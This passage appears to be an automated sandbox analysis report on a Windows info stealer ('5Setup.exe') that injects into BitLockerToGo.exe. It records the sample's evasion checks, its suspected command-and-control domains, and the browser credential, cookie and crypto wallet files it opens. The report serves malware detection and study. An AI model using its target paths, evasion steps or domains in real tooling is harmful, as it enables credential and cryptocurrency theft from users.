                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: 5Setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: 5Setup.exeStatic file information: File size 15018496 > 1048576
                      Source: 5Setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x6fea00
                      Source: 5Setup.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x658200
                      Source: 5Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: BitLockerToGo.pdb source: 5Setup.exe, 00000000.00000002.1880927609.0000000001E08000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: BitLockerToGo.pdbGCTL source: 5Setup.exe, 00000000.00000002.1880927609.0000000001E08000.00000004.00001000.00020000.00000000.sdmp
                      Source: 5Setup.exeStatic PE information: section name: .symtab
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0044C53B push esi; retf 1_2_0044C53E
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0044C698 push eax; ret 1_2_0044C699
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0044C8C5 pushad ; retf 1_2_0044C8C7
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0041B928 pushad ; ret 1_2_0041B929
                      Source: C:\Users\user\Desktop\5Setup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6712Thread sleep time: -150000s >= -30000sJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6656Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: BitLockerToGo.exe, 00000001.00000002.2024024374.000000000316D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.2023658335.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1891228978.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2024116658.00000000031A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 5Setup.exe, 00000000.00000002.1879559968.000000000174C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_00442710 LdrInitializeThunk,1_2_00442710

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\5Setup.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: 5Setup.exe, 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: offybirhtdi.sbs
                      Source: 5Setup.exe, 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: activedomest.sbs
                      Source: 5Setup.exe, 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: arenbootk.sbs
                      Source: 5Setup.exe, 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mediavelk.sbs
                      Source: 5Setup.exe, 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: definitib.sbs
                      Source: 5Setup.exe, 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: elaboretib.sbs
                      Source: 5Setup.exe, 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: strikebripm.sbs
                      Source: 5Setup.exe, 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ostracizez.sbs
                      Source: 5Setup.exe, 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fashionablei.sbs
                      Source: C:\Users\user\Desktop\5Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: C37008Jump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 448000Jump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44B000Jump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 45B000Jump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5Setup.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6512, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.5Setup.exe.20ae000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.2002000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.2058000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.20ae000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.2002000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5Setup.exe.2058000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1880927609.00000000020AE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1880927609.0000000002058000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1880927609.0000000002002000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: BitLockerToGo.exe, 00000001.00000003.1987940580.00000000031FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                      Source: BitLockerToGo.exe, 00000001.00000003.1987940580.00000000031FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                      Source: BitLockerToGo.exe, 00000001.00000003.1987940580.00000000031FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: BitLockerToGo.exe, 00000001.00000003.1988260687.0000000003213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                      Source: BitLockerToGo.exe, 00000001.00000003.1987752328.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                      Source: BitLockerToGo.exe, 00000001.00000003.1933964546.0000000003205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum","m":["keystorF
                      Source: BitLockerToGo.exe, 00000001.00000003.1987752328.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                      Source: BitLockerToGo.exe, 00000001.00000003.1987752328.0000000003203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
